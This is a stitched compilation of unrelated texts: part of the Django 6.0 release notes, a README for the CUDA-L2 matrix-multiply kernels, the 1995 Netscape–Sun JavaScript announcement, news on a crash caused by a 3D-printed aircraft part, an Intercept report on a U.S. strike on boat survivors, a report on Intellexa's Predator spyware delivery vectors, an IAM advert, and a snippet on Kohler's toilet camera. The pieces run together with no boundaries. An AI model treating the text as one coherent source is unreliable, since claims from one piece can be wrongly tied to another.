Python’s older legacy (
Compat32
) API, which relied on lower-level MIME
classes (from
email.mime
) and required more manual handling of
message structure and encoding.
Notably, the return type of the
EmailMessage.message()
method is now an instance of Python’s
email.message.EmailMessage
. This supports the same API as the
previous
SafeMIMEText
and
SafeMIMEMultipart
return types, but is not an
instance of those now-deprecated classes.
django.contrib.admin
¶
The Font Awesome Free icon set (version 6.7.2) is now used for the admin interface icons.
The new
AdminSite.password_change_form
attribute allows customizing
the form used in the admin site password change view.
Message levels
messages.DEBUG
and
messages.INFO
now have distinct
icons and CSS styling. Previously, both levels shared the same appearance as
messages.SUCCESS
. Given that
ModelAdmin.message_user()
uses
messages.INFO
by default, set the level to
messages.SUCCESS
to keep
the previous icon and styling.
django.contrib.auth
¶
The default iteration count for the PBKDF2 password hasher is increased from 1,000,000 to 1,200,000.
django.contrib.gis
¶
The new
GEOSGeometry.hasm
property checks whether the geometry has
the M dimension.
The new
Rotate
database
function rotates a geometry by a specified angle around the origin or a
specified point.
The new
BaseGeometryWidget.base_layer
attribute allows specifying a
JavaScript map base layer, enabling customization of map tile providers.
coveredby
and
isvalid
lookups,
Collect
aggregation, and
GeoHash
and
IsValid
database functions
are now supported on MariaDB 12.0.1+.
The new
geom_type
lookup and
GeometryType()
database function allow filtering geometries by their types.
Widgets from
django.contrib.gis.forms.widgets
now render without
inline JavaScript in templates. If you have customized any geometry widgets
or their templates, you may need to
update them
to match the new layout.
django.contrib.postgres
¶
The new
Lexeme
expression
for full text search provides fine-grained control over search terms.
Lexeme
objects automatically escape their input and support logical
combination operators (
&
,
|
,
~
), prefix matching, and term
weighting.
Model fields, indexes, and constraints from
django.contrib.postgres
now include system checks to verify that
django.contrib.postgres
is an
installed app.
The
CreateExtension
,
BloomExtension
,
BtreeGinExtension
,
BtreeGistExtension
,
CITextExtension
,
CryptoExtension
,
HStoreExtension
,
TrigramExtension
, and
UnaccentExtension
operations now support the optional
hints
parameter. This allows providing database hints to database routers to assist
them in
making routing decisions
.
django.contrib.staticfiles
¶
ManifestStaticFilesStorage
now
ensures consistent path ordering in manifest files, making them more
reproducible and reducing unnecessary diffs.
The
collectstatic
command now reports only a summary for skipped
files (and for deleted files when using
--clear
) at
--verbosity
1. To
see per-file details for either case, set
--verbosity
to 2 or higher.
The new
policy
argument for
EmailMessage.message()
allows specifying the email policy,
the set of rules for updating and serializing the representation of the
message. Defaults to
email.policy.default
.
EmailMessage.attach()
now
accepts a
MIMEPart
object from Python’s modern email
API.
Added support and translations for the Haitian Creole language.
The
startproject
and
startapp
commands now create the
custom target directory if it doesn’t exist.
Common utilities, such as
django.conf.settings
, are now automatically
imported to the
shell
by default.
Squashed migrations can now themselves be squashed before being transitioned to normal migrations.
Migrations now support serialization of
zoneinfo.ZoneInfo
instances.
Serialization of deconstructible objects now supports keyword arguments with names that are not valid Python identifiers.
Constraints
now implement a
check()
method that is already registered with the check framework.
The new
order_by
argument for
Aggregate
allows
specifying the ordering of the elements in the result.
The new
Aggregate.allow_order_by
class attribute determines whether
the aggregate function allows passing an
order_by
keyword argument.
The new
StringAgg
aggregate returns the input
values concatenated into a string, separated by the
delimiter
string.
This aggregate was previously supported only for PostgreSQL.
The
save()
method now raises a specialized
Model.NotUpdated
exception, when
a forced update
results in no affected rows,
instead of a generic
django.db.DatabaseError
.
QuerySet.raw()
now supports models with a
CompositePrimaryKey
.
Subqueries returning a
CompositePrimaryKey
can now
be used as the target of lookups other than
__in
, such as
__exact
.
JSONField
now supports
negative array indexing
on SQLite.
The new
AnyValue
aggregate returns an arbitrary
value from the non-null input values. This is supported on SQLite, MySQL,
Oracle, and PostgreSQL 16+.
GeneratedField
s and
fields assigned
expressions
are now refreshed from the
database after
save()
on backends that support
the
RETURNING
clause (SQLite, PostgreSQL, and Oracle). On backends that
don’t support it (MySQL and MariaDB), the fields are marked as deferred to
trigger a refresh on subsequent accesses.
Using a
ForeignObject
with multiple
from_fields
in Model indexes, constraints, or
unique_together
now emits a system check error.
The new
AsyncPaginator
and
AsyncPage
provide async implementations of
Paginator
and
Page
respectively.
Multiple
Cookie
headers are now supported for HTTP/2 requests when
running with ASGI.
The new variable
forloop.length
is now available within a
for
loop.
The
querystring
template tag now consistently prefixes the returned
query string with a
?
, ensuring reliable link generation behavior.
The
querystring
template tag now accepts multiple positional
arguments, which must be mappings, such as
QueryDict
or
dict
.
The
DiscoverRunner
now supports parallel test execution on systems
using the
forkserver
multiprocessing
start method.
This section describes changes that may be needed in third-party database backends.
BaseDatabaseSchemaEditor
and
PostgreSQL backends no longer use
CASCADE
when dropping a column.
DatabaseOperations.return_insert_columns()
and
DatabaseOperations.fetch_returned_insert_rows()
methods are renamed to
returning_columns()
and
fetch_returned_rows()
, respectively, to
denote they can be used in the context of
UPDATE
…
RETURNING
statements
as well as
INSERT
…
RETURNING
.
The
DatabaseOperations.fetch_returned_insert_columns()
method is removed
and the
fetch_returned_rows()
method replacing
fetch_returned_insert_rows()
expects both a
cursor
and
returning_params
to be provided, just like
fetch_returned_insert_columns()
did.
If the database supports
UPDATE
…
RETURNING
statements, backends can set
DatabaseFeatures.can_return_rows_from_update=True
.
Upstream support for MariaDB 10.5 ends in June 2025. Django 6.0 supports MariaDB 10.6 and higher.
Because Python 3.12 is now the minimum supported version for Django, any optional dependencies must also meet that requirement. The following versions of each library are the first to add or confirm compatibility with Python 3.12:
aiosmtpd
1.4.5
argon2-cffi
23.1.0
bcrypt
4.1.1
docutils
0.22
geoip2
4.8.0
Pillow
10.1.0
mysqlclient
2.2.1
numpy
1.26.0
PyYAML
6.0.2
psycopg
3.1.12
psycopg2
2.9.9
redis-py
5.1.0
selenium
4.23.0
sqlparse
0.5.0
tblib
3.0.0
The undocumented
mixed_subtype
and
alternative_subtype
properties
of
EmailMessage
and
EmailMultiAlternatives
are no longer supported.
The undocumented
encoding
property of
EmailMessage
no longer supports Python legacy
email.charset.Charset
objects.
As the internal implementations of
EmailMessage
and
EmailMultiAlternatives
have changed
significantly, closely examine any custom subclasses that rely on overriding
undocumented, internal underscore methods.
DEFAULT_AUTO_FIELD
setting now defaults to
BigAutoField
¶
Since Django 3.2, when the
DEFAULT_AUTO_FIELD
setting was added,
the default
startproject
template’s
settings.py
contained:
DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"
and the default
startapp
template’s
AppConfig
contained:
default_auto_field = "django.db.models.BigAutoField"
At that time, the default value of
DEFAULT_AUTO_FIELD
remained
django.db.models.AutoField
for backwards compatibility.
In Django 6.0,
DEFAULT_AUTO_FIELD
now defaults to
django.db.models.BigAutoField
and the aforementioned lines in the
project and app templates are removed.
Most projects shouldn’t be affected, since Django 3.2 has raised the system
check warning
models.W042
for projects that don’t set
DEFAULT_AUTO_FIELD
.
If you haven’t dealt with this warning by now, add
DEFAULT_AUTO_FIELD
=
'django.db.models.AutoField'
to your project’s
settings, or
default_auto_field
=
'django.db.models.AutoField'
to an app’s
AppConfig
, as needed.
Prior to Django 6.0,
custom lookups
and
custom expressions
implementing the
as_sql()
method (and its supporting methods
process_lhs()
and
process_rhs()
) were allowed to return a sequence of params in either a list
or a tuple. To address the interoperability problems that resulted, the second
return element of the
as_sql()
method should now be a tuple:
def as_sql(self, compiler, connection) -> tuple[str, tuple]: ...
If your custom expressions support multiple versions of Django, you should adjust any pre-processing of parameters to be resilient against either tuples or lists. For instance, prefer unpacking like this:
params = (*lhs_params, *rhs_params)
The
JSON
serializer now writes a newline
at the end of the output, even without the
indent
option set.
The minimum supported version of
asgiref
is increased from 3.8.1 to
3.9.1.
django.core.mail
APIs
¶
django.core.mail
APIs now require keyword arguments for less commonly
used parameters. Using positional arguments for these now emits a deprecation
warning and will raise a
TypeError
when the deprecation period ends:
All
optional
parameters (
fail_silently
and later) must be passed as
keyword arguments to
get_connection()
,
mail_admins()
,
mail_managers()
,
send_mail()
, and
send_mass_mail()
.
All parameters must be passed as keyword arguments when creating an
EmailMessage
or
EmailMultiAlternatives
instance, except
for the first four (
subject
,
body
,
from_email
, and
to
), which
may still be passed either as positional or keyword arguments.
BaseDatabaseCreation.create_test_db(serialize)
is deprecated. Use
serialize_db_to_string()
instead.
The PostgreSQL
StringAgg
class is deprecated in favor of the generally
available
StringAgg
class.
The PostgreSQL
OrderableAggMixin
is deprecated in favor of the
order_by
attribute now available on the
Aggregate
class.
The default protocol in
urlize
and
urlizetrunc
will
change from HTTP to HTTPS in Django 7.0. Set the transitional setting
URLIZE_ASSUME_HTTPS
to
True
to opt into assuming HTTPS during
the Django 6.x release cycle.
The
URLIZE_ASSUME_HTTPS
transitional setting is deprecated.
Setting
ADMINS
or
MANAGERS
to a list of (name, address)
tuples is deprecated. Set to a list of email address strings instead. Django
never used the name portion. To include a name, format the address string as
'"Name"
<address>'
or use Python’s
email.utils.formataddr()
.
Support for the
orphans
argument being larger than or equal to the
per_page
argument of
django.core.paginator.Paginator
and
django.core.paginator.AsyncPaginator
is deprecated.
Using a percent sign in a column alias or annotation is deprecated.
Support for passing Python’s legacy email
MIMEBase
object to
EmailMessage.attach()
(or
including one in the message’s
attachments
list) is deprecated. For
complex attachments requiring additional headers or parameters, switch to the
modern email API’s
MIMEPart
.
The
django.core.mail.BadHeaderError
exception is deprecated. Python’s
modern email raises a
ValueError
for email headers containing
prohibited characters.
The
django.core.mail.SafeMIMEText
and
SafeMIMEMultipart
classes are
deprecated.
The undocumented
django.core.mail.forbid_multi_line_headers()
and
django.core.mail.message.sanitize_address()
functions are deprecated.
These features have reached the end of their deprecation cycle and are removed in Django 6.0.
See Features deprecated in 5.0 for details on these changes, including how to remove usage of these features.
Support for passing positional arguments to
BaseConstraint
is removed.
The
DjangoDivFormRenderer
and
Jinja2DivFormRenderer
transitional form
renderers are removed.
BaseDatabaseOperations.field_cast_sql()
is removed.
request
is required in the signature of
ModelAdmin.lookup_allowed()
subclasses.
Support for calling
format_html()
without passing args or kwargs is
removed.
The default scheme for
forms.URLField
has changed from
"http"
to
"https"
.
The
FORMS_URLFIELD_ASSUME_HTTPS
transitional setting is removed.
The
django.db.models.sql.datastructures.Join
no longer falls back to
get_joining_columns()
.
The
get_joining_columns()
method of
ForeignObject
and
ForeignObjectRel
is removed.
The
ForeignObject.get_reverse_joining_columns()
method is removed.
Support for
cx_Oracle
is removed.
The
ChoicesMeta
alias to
django.db.models.enums.ChoicesType
is
removed.
The
Prefetch.get_current_queryset()
method is removed.
The
get_prefetch_queryset()
method of related managers and descriptors is
removed.
get_prefetcher()
and
prefetch_related_objects()
no longer fall back
to
get_prefetch_queryset()
.
See Features deprecated in 5.1 for details on these changes, including how to remove usage of these features.
django.urls.register_converter()
no longer allows overriding existing
converters.
The
ModelAdmin.log_deletion()
and
LogEntryManager.log_action()
methods are removed.
The undocumented
django.utils.itercompat.is_iterable()
function and the
django.utils.itercompat
module are removed.
The
django.contrib.gis.geoip2.GeoIP2.coords()
method is removed.
The
django.contrib.gis.geoip2.GeoIP2.open()
method is removed.
Support for passing positional arguments to
Model.save()
and
Model.asave()
is removed.
The setter for
django.contrib.gis.gdal.OGRGeometry.coord_dim
is removed.
The
check
keyword argument of
CheckConstraint
is removed.
The
get_cache_name()
method of
FieldCacheMixin
is removed.
The
OS_OPEN_FLAGS
attribute of
FileSystemStorage
is removed.
CUDA-L2 is a system that combines large language models (LLMs) and reinforcement learning (RL) to automatically optimize Half-precision General Matrix Multiply (HGEMM) CUDA kernels. CUDA-L2 systematically outperforms major matmul baselines to date, from the widely-used torch.matmul to state-of-the-art NVIDIA closed-source libraries (cuBLAS, cuBLASLt-heuristic, cuBLASLt-AutoTuning). Paper
Speedup of CUDA-L2 over torch.matmul, cuBLAS, cuBLASLt-heuristic, and cuBLASLt-AutoTuning across 1000 (M,N,K) configurations on A100.
Speedup comparison results across 1000 (M,N,K) configurations on A100.
Q: Do A100 kernels apply to other machines like RTX 3090 or H100?
A: Ideally, kernels trained on A100 should only be used on A100 if you are targeting speedup. They might have speedup on other machines, but it's not guaranteed. We will progressively release kernels trained on different machines.
Q: What if I need matrix dimensions (M, N, K) not found in your configurations?
A: 1. You can find the nearest neighbor configuration (larger than yours) and pad with zeros. 2. Feel free to post your dimensions on GitHub issues. We are happy to release kernels for your configuration.
This project depends on NVIDIA CUTLASS. You must clone specific tag
v4.2.1
into a directory named
cutlass
:
git clone -b v4.2.1 https://github.com/NVIDIA/cutlass.git cutlass
⚠️ Warning : Please ensure you download the correct CUTLASS version (v4.2.1) and set theCUTLASS_DIRenvironment variable correctly. Incorrect CUTLASS setup may cause the project to fail silently or produce no results.
Before building or running the project, you must configure the following environment variables:
CUTLASS_DIR
: Points to the directory where you cloned CUTLASS.
TORCH_CUDA_ARCH_LIST
: Specifies the target GPU architecture (e.g., "8.0" for NVIDIA Ampere / A100 / RTX 30 series).
Run the following commands:
export CUTLASS_DIR=/path/to/your/cutlass export TORCH_CUDA_ARCH_LIST="8.0"
To run the evaluation, use the
eval_one_file.sh
script. Below is an example command for offline mode:
./eval_one_file.sh --mnk 64_4096_64 --warmup_seconds 5 --benchmark_seconds 10 --base_dir ./results --gpu_device_id 7 --mode offline
For server mode, you need to specify
--target_qps
:
./eval_one_file.sh --mnk 64_4096_64 --warmup_seconds 5 --benchmark_seconds 10 --base_dir ./results --gpu_device_id 7 --mode server --target_qps 100
| Argument | Description |
|---|---|
--mnk
|
Specifies the problem size (e.g.,
64_4096_64
).
|
--warmup_seconds
|
Duration of warmup in seconds before timing. |
--benchmark_seconds
|
Duration of benchmarking in seconds. |
--base_dir
|
Directory to save the compile and output results. |
--gpu_device_id
|
The ID of the GPU to use (e.g.,
7
).
|
--mode
|
Execution mode.
Options are:
•
offline
: Runs the evaluation in offline/batch processing mode.
•
server
: Runs the evaluation in server mode (simulating request-based scenarios).
|
--target_qps
|
Target Queries Per Second (QPS) for server mode. Required if mode is
server
.
|
If you have any questions, please open a GitHub issue or reach out to us at jiwei_li@deep-reinforce.com .
MOUNTAIN VIEW, Calif. (December 4, 1995) -- Netscape Communications Corporation (NASDAQ: NSCP) and Sun Microsystems, Inc. (NASDAQ:SUNW), today announced JavaScript, an open, cross-platform object scripting language for the creation and customization of applications on enterprise networks and the Internet. The JavaScript language complements Java, Sun's industry-leading object-oriented, cross-platform programming language. The initial version of JavaScript is available now as part of the beta version of Netscape Navigator 2.0, which is currently available for downloading from Netscape's web site.
In addition, 28 industry-leading companies, including America Online, Inc., Apple Computer, Inc., Architext Software, Attachmate Corporation, AT&T;, Borland International, Brio Technology, Inc., Computer Associates, Inc., Digital Equipment Corporation, Hewlett-Packard Company, Iconovex Corporation, Illustra Information Technologies, Inc., Informix Software, Inc., Intuit, Inc., Macromedia, Metrowerks, Inc., Novell, Inc., Oracle Corporation, Paper Software, Inc., Precept Software, Inc., RAD Technologies, Inc., The Santa Cruz Operation, Inc., Silicon Graphics, Inc., Spider Technologies, Sybase, Inc., Toshiba Corporation, Verity, Inc., and Vermeer Technologies, Inc., have endorsed JavaScript as an open standard object scripting language and intend to provide it in future products. The draft specification of JavaScript, as well as the final draft specification of Java, is planned for publishing and submission to appropriate standards bodies for industry review and comment this month.
JavaScript is an easy-to-use object scripting language designed for creating live online applications that link together objects and resources on both clients and servers. While Java is used by programmers to create new objects and applets, JavaScript is designed for use by HTML page authors and enterprise application developers to dynamically script the behavior of objects running on either the client or the server. JavaScript is analogous to Visual Basic in that it can be used by people with little or no programming experience to quickly construct complex applications. JavaScript's design represents the next generation of software designed specifically for the Internet and is:
With JavaScript, an HTML page might contain an intelligent form that performs loan payment or currency exchange calculations right on the client in response to user input. A multimedia weather forecast applet written in Java can be scripted by JavaScript to display appropriate images and sounds based on the current weather readings in a region. A server-side JavaScript script might pull data out of a relational database and format it in HTML on the fly. A page might contain JavaScript scripts that run on both the client and the server. On the server, the scripts might dynamically compose and format HTML content based on user preferences stored in a relational database, and on the client, the scripts would glue together an assortment of Java applets and HTML form elements into a live interactive user interface for specifying a net-wide search for information.
Java programs and JavaScript scripts are designed to run on both clients and servers, with JavaScript scripts used to modify the properties and behavior of Java objects, so the range of live online applications that dynamically present information to and interact with users over enterprise networks or the Internet is virtually unlimited. Netscape will support Java and JavaScript in client and server products as well as programming tools and applications to make this vision a reality.
"Programmers have been overwhelmingly enthusiastic about Java because it was designed from the ground up for the Internet. JavaScript is a natural fit, since it's also designed for the Internet and Unicode-based worldwide use," said Bill Joy, co-founder and vice president of research at Sun. "JavaScript will be the most effective method to connect HTML-based content to Java applets."
Netscape's authoring and application development tools -- Netscape Navigator Gold 2.0, Netscape LiveWire and Netscape LiveWire Pro -- are designed for rapid development and deployment of JavaScript applications. Netscape Navigator Gold 2.0 enables developers to create and edit JavaScript scripts, while Netscape LiveWire enables JavaScript programs to be installed, run and managed on Netscape servers, both within the enterprise and across the Internet. Netscape LiveWire Pro adds support for JavaScript connectivity to high-performance relational databases from Illustra, Informix, Microsoft, Oracle and Sybase. Java and JavaScript support are being built into all Netscape products to provide a unified, front-to-back, client/server/tool environment for building and deploying live online applications.
Java is available to developers free of charge. The Java Compiler and Java Developer's Kit as well as the HotJava browser and related documentation are available from Sun's web site at http://java.sun.com. In addition, the Java source code can be licensed for a fee. Details on licensing are also available via the java.sun.com web page. To date, Sun has licensed Java to a number of leading technology companies, including Borland, Macromedia, Mitsubishi, Netscape, Oracle, Silicon Graphics, Spyglass, and Toshiba. Sun's Workshop for Java toolkit is scheduled for release in Spring 1996. Sun's NEO product family, the first complete development, operating and management environment for object-oriented networked applications, will also use Java-enabled browsers as front-ends to the NEO environment.
Netscape and Sun plan to propose JavaScript to the W3 Consortium (W3C) and the Internet Engineering Task Force (IETF) as an open Internet scripting language standard. JavaScript will be an open, freely licensed proposed standard available to the entire Internet community. Existing Sun Java licensees will receive a license to JavaScript. In addition, Sun and Netscape intend to make a source code reference implementation of JavaScript available for royalty-free licensing, further encouraging its adoption as a standard in a wide variety of products.
Netscape Communications Corporation is a premier provider of open software for linking people and information over enterprise networks and the Internet. The company offers a full line of Netscape Navigator clients, Netscape servers, development tools and Netscape Internet Applications to create a complete platform for next-generation, live online applications. Traded on Nasdaq under the symbol "NSCP", Netscape Communications Corporation is based in Mountain View, California.
With annual revenues of $6 billion, Sun Microsystems, Inc. provides solutions that enable customers to build and maintain open network computing environments. Widely recognized as a proponent of open standards, the company is involved in the design, manufacture and sale of products, technologies and services for commercial and technical computing. Sun's SPARC(TM) workstations, multiprocessing servers, SPARC microprocessors, Solaris operating software and ISO-certified service organization each rank No. 1 in the UNIX(R) industry. Founded in 1982, Sun is headquartered in Mountain View, Calif., and employs more than 14,000 people worldwide.
Additional information on Netscape Communications Corporation is available on the Internet at , by sending email to info@netscape.com or by calling 415-528-2555. Additional information on Sun Microsystems is available on the Internet at http://www.sun.com or, for Java information, http://java.sun.com Netscape Communications, the Netscape Communications logo, Netscape, and Netscape Navigator are trademarks of Netscape Communications Corporation. JavaScript and Java are trademarks of Sun Microsystems, Inc. All other product names are trademarks of their respective companies.
WHAT COMPANIES SAY ABOUT JAVASCRIPT
Company Contacts:
America Online, Inc. Pam Mcgraw: (703) 556-3746
Apple Computer, Inc. Nancy Morrison: (408) 862-6200
Architext Software Mike Brogan/Roederer-Johnson: (415) 802-1850
AT&T; Mary Whelan: (908) 658-6000
Borland International Bill Jordan: (408) 431-4721
Brio Technology, Inc. Yorgen Edholm: yhe@brio.com
Computer Associates, Inc. Yogesh Gupta: (516) 342-4045
Digital Equipment Corporation Ethel Kaiden: (508) 486-2814
Hewlett-Packard Company Bill Hodges: (408) 447-7041
Iconovex Corporation Robert Griggs: (800) 943-0292
Illustra Information Technologies, Inc. Sandra Bateman: (510) 873-62
09
Informix Software, Inc. Cecilia Denny: (415) 926-6420
Intuit, Inc. Sheryl Ross: (415) 329-3569
Macromedia Miles Walsh: (415) 252-2000
Metrowerks, Inc. Greg Galanos: gpg@austin.metrowerks.com
Novell, Inc. Christine Hughes: (408) 577-7453
Oracle Corporation Mark Benioff: (415) 506-7000
Paper Software, Inc. Mike Mccue: (914) 679-2440
Precept Software, Inc. Judy Estrin: (408) 446-7600
RAD Technologies, Inc. Jeff Morgan: jmorgan@rad.com
The Santa Cruz Operation, Inc. Marty Picco: (408) 425-7222
Silicon Graphics, Inc. Virginia Henderson: (415) 933-1306
Spider Technologies Diana Jovin: (415) 969-6128
Sybase, Inc. Robert Manetta: (510) 922-5742
Verity, Inc. Marguerite Padovani: (415) 960-7724
Vermeer Technologies, Inc. Ed Cuoco: (617) 576-1700x130
Netscape Communications Corporation is a premier provider of open software for linking people and information over enterprise networks and the Internet. The company offers a full line of Netscape Navigator clients, Netscape servers, development tools and Netscape Internet Applications to create a complete platform for next-generation, live online applications. Traded on Nasdaq under the symbol "NSCP", Netscape Communications Corporation is based in Mountain View, California.
Netscape Communications, the Netscape Communications logo, Netscape, Netscape Commerce Server, Netscape Communications Server, Netscape Proxy Server and Netscape News Server are trademarks of Netscape Communications Corporation. NCSA Mosaic is a trademark of the University of Illinois. All other product names are trademarks of their respective companies.
|
© 1999 Netscape, All Rights Reserved.
Legal & Privacy Notices
This site powered by Netscape SuiteSpot servers . |
||||
Maisie Lillywhite
Gloucestershire
Air Accidents Investigation Branch
A plane crashed after a 3D-printed part softened and collapsed, causing its engine to lose power, a report has found.
The Cozy Mk IV light aircraft was destroyed after its plastic air induction elbow, bought at an air show in North America, collapsed.
The aircraft crashed into a landing aid system at Gloucestershire Airport in Staverton on 18 March at 13:04 GMT, after its engine lost power. The sole occupant was taken to hospital with minor injuries.
The Air Accidents Investigation Branch (AAIB) said in a report that the induction elbow was made of "inappropriate material" and safety actions will be taken in future regarding 3D printed parts.
AAIB
Following an "uneventful local flight", the AAIB report said the pilot advanced the throttle on the final approach to the runway, and realised the engine had suffered a complete loss of power.
"He managed to fly over a road and a line of bushes on the airfield boundary, but landed short and struck the instrument landing system before coming to rest at the side of the structure," the report read.
It was revealed the part had been installed during a modification to the fuel system and collapsed due to its 3D-printed plastic material softening when exposed to heat from the engine.
The Light Aircraft Association (LAA) said it now intends to take safety actions in response to the accident, including a "LAA Alert" regarding the use of 3D-printed parts that will be sent to inspectors.
Lawmakers who saw a video of a U.S. attack on wounded and helpless people clinging to the wreckage of a supposed drug boat on September 2 described the footage as deeply disturbing.
A small number of members of the House Permanent Select Committee on Intelligence and the Senate and House Armed Services committees, as well as some staff directors, saw the recording during closed-door briefings Thursday with Adm. Frank M. Bradley , the head of Special Operations Command, and Gen. Dan Caine, the chair of the Joint Chiefs of Staff.
“What I saw in that room is one of the most troubling scenes I’ve ever seen in my time in public service,” said Rep. Jim Himes of Connecticut, the top Democrat on the House Intelligence Committee. “You have two individuals in clear distress without any means of locomotion with a destroyed vessel who were killed by the United States.
Until Thursday, the only video of the attack that had been seen by lawmakers was an edited clip posted to the Truth Social account of President Donald Trump on September 2 announcing the strike. The edited clip captures the initial strike, showing a four-engine speedboat erupt in an explosion. It does not show the second strike on the wreckage of the vessel and the survivors — which was first reported by The Intercept .
Himes said the unedited video clearly shows the U.S. striking helpless people.
“Any American who sees the video that I saw will see the United States military attacking shipwrecked sailors.”
“Any American who sees the video that I saw will see the United States military attacking shipwrecked sailors — bad guys, bad guys, but attacking shipwrecked sailors,” he told The Intercept.
Himes said that Bradley — who conducted the follow-up strike as the then-commander of Joint Special Operations Command — “confirmed that there had not been a ‘kill them all’ order.” The Washington Post recently reported that Hegseth personally ordered the follow-up attack, giving a spoken order “to kill everybody.”
Sen. Jack Reed of Rhode Island, the top Democrat on the Armed Services Committee, also expressed dismay after watching the footage. “I am deeply disturbed by what I saw this morning. The Department of Defense has no choice but to release the complete, unedited footage of the September 2 strike, as the President has agreed to do,” he said on Thursday.
“This briefing confirmed my worst fears about the nature of the Trump Administration’s military activities, and demonstrates exactly why the Senate Armed Services Committee has repeatedly requested — and been denied — fundamental information, documents, and facts about this operation. This must and will be the only beginning of our investigation into this incident,” said Reed.
Trump has said he supports the release of the video showing the second boat strike that killed the remaining survivors of the initial September 2 attack . “I don’t know what they have, but whatever they have, we’d certainly release, no problem,” Trump told reporters in the Oval Office on Wednesday.
Brian Finucane, a former State Department lawyer who is a specialist in counterterrorism issues and the laws of war, told The Intercept that intense scrutiny needs to extend far beyond the first strike in the U.S. operation in the waters near Venezuela.
“Oversight needs to be broader than this one incident. It needs to cover the entire maritime bombing campaign. And it needs to go beyond the Department of Defense,” he told The Intercept. “We need to know how this policy was formulated in the first instance. What was the process by which some aspect of it got legal blessing from the Justice Department’s Office of Legal Counsel? That all needs to be drug out into the open.”
The military has carried out 21 known attacks, destroying 22 boats in the Caribbean Sea and eastern Pacific Ocean since September, killing at least 83 civilians . The most recent strike on a vessel was November 15.
Since the attacks began, experts in the laws of war and members of Congress, from both parties , have described the strikes as illegal extrajudicial killings because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence. Throughout the long-running U.S. war on drugs , law enforcement agencies have arrested suspected drug smugglers rather than relying on summary executions. The double-tap strike first reported by The Intercept has only made worse a pattern of attacks that experts and lawmakers say are already tantamount to murder .
Sarah Harrison, who previously advised Pentagon policymakers on issues related to human rights and the law of war, cautioned against undue focus on the double-tap strike. “I can understand why the public and lawmakers are shocked by the second strike on Sept 2. The imagery of humans clinging to wreckage, likely severely injured, and then subsequently executed, is no doubt jarring. But we have to keep emphasizing to those who are conducting the strikes within DoD that there is no war, thus no law of war to protect them,” said Harrison, a former associate general counsel at the Pentagon’s Office of General Counsel, International Affairs. “All of the strikes, not just the Sept 2 incident, are extrajudicial killings of people alleged to have committed crimes. Americans should have been and should continue to be alarmed by that.”
The Pentagon continues to argue it is at war with undisclosed drug cartels and gangs. “I can tell you that every single person who we have hit thus far who is in a drug boat carrying narcotics to the United States is a narcoterrorist. Our intelligence has confirmed that, and we stand by it,” Pentagon press secretary Kingsley Wilson said Tuesday .
“There is no such thing as a narco-terrorist,” Himes said on Thursday. “Apparently, we have enough evidence to kill these people, but we don’t have enough evidence to try them in a court of law. People ought to sort of let that sink in and think about the implications of that.”
“Apparently, we have enough evidence to kill these people, but we don’t have enough evidence to try them in a court of law.”
Sources briefed about the video footage say it contradicts a narrative that emerged in recent days that intercepted communications between the survivors and their supposed colleagues demonstrated those wounded individuals clinging to the wreckage were combatants, rather than shipwrecked and defenseless people whom it would be a war crime to target.
The Pentagon’s Law of War Manual is clear on attacking defenseless people. “Persons who have been rendered unconscious or otherwise incapacitated by wounds, sickness, or shipwreck, such that they are no longer capable of fighting, are hors de combat,” reads the guide using the French term for those out of combat. “Persons who have been incapacitated by wounds, sickness, or shipwreck are in a helpless state, and it would be dishonorable and inhumane to make them the object of attack.”
“The notion that radioing for help forfeits your shipwreck status is absurd — much less than it enables them to target you,” said Finucane. “I don’t believe there’s an armed conflict, so none of these people are lawful targets. They weren’t combatants, they’re not participating in hostilities. So the whole construct is ridiculous. But even if you accept that this is some sort of law of war situation, radioing for help does not deprive you of shipwreck status or render you a target under the law of war.”
The Predator spyware from surveillance company Intellexa has been using a zero-click infection mechanism dubbed “Aladdin,” which compromised specific targets by simply viewing a malicious advertisement.
This powerful and previously unknown infection vector is meticulously hidden behind shell companies spread across multiple countries, now uncovered in a new joint investigation by Inside Story , Haaretz , and WAV Research Collective .
The investigation is based on 'Intellexa Leaks' - a collection of leaked internal company documents and marketing material, and is corroborated by technical research from forensic and security experts at Amnesty International, Google, and Recorded Future.
First deployed in 2024 and believed to still be operational and actively developed, Aladdin leverages the commercial mobile advertising system to deliver malware.
The mechanism forces weaponized ads onto specific targets identified by their public IP address and other identifiers, instructing the platforms via the Demand Side Platform (DSP) to serve it on any website participating in the ad network.
“This malicious ad could be served on any website that displays ads, such as a trusted news website or mobile app, and would appear like any other ad that the target is likely to see,” explains Amnesty International’s Security Lab .
“Internal company materials explain that simply viewing the advertisement is enough to trigger the infection on the target’s device, without any need to click on the advertisement itself.”
Although no details are available on how the infection works, Google mentions that the ads trigger redirections to Intellexa’s exploit delivery servers.
The ads are funneled through a complex network of advertising firms spread across multiple countries, including Ireland, Germany, Switzerland, Greece, Cyprus, the UAE, and Hungary.
Recorded Future dug deeper into the advertising network, connecting the dots between key people, firms, and infrastructure, and naming some of those companies in its report .
Defending against those malicious ads is complex, but blocking ads on the browser would be a good starting point.
Another potential defense measure would be to set the browser to hide the public IP from trackers.
However, the leaked documents show that Intellexa can still obtain the information from domestic mobile operators in their client’s country.
Another key finding in the leak is confirmation of the existence of another delivery vector called 'Triton', which can target devices with Samsung Exynos with baseband exploits, forcing 2G downgrades to lay the ground for infection.
Amnesty International’s analysts are unsure whether this vector is still used and note that there are two other, possibly similar delivery mechanisms, codenamed 'Thor' and 'Oberon', believed to involve radio communications or physical access attacks.
Google’s researchers name Intellexa as one of the most prolific commercial spyware vendors in terms of zero-day exploitation, responsible for 15 out of the 70 cases of zero-day exploitation TAG discovered and documented since 2021.
Google says Intellexa develops its own exploits and also purchases exploit chains from external entities to cover the full spectrum of required targeting.
Despite sanctions and ongoing investigations against Intellexa in Greece, the spyware operator is as active as ever, according to Amnesty International.
As Predator evolves into becoming stealthier and harder to trace, users are recommended to consider enabling extra protection on their mobile devices, like Advanced Protection on Android and Lockdown Mode on iOS.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
Home goods company Kohler would like a bold look in your toilet to take some photos. It’s OK, though, the company has promised that all the data it collects on your “waste” will be “end-to-end encrypted.” However, a deeper look into the company’s claim by technologist Simon Fondrie-Teitler revealed that Kohler seems to have no idea what E2EE actually means. According to Fondrie-Teitler’s write-up , which was first reported by TechCrunch , the company will have access to the photos the camera takes and may even use them to train AI.
The whole fiasco gives an entirely too on-the-nose meaning to the “Internet of Shit.”
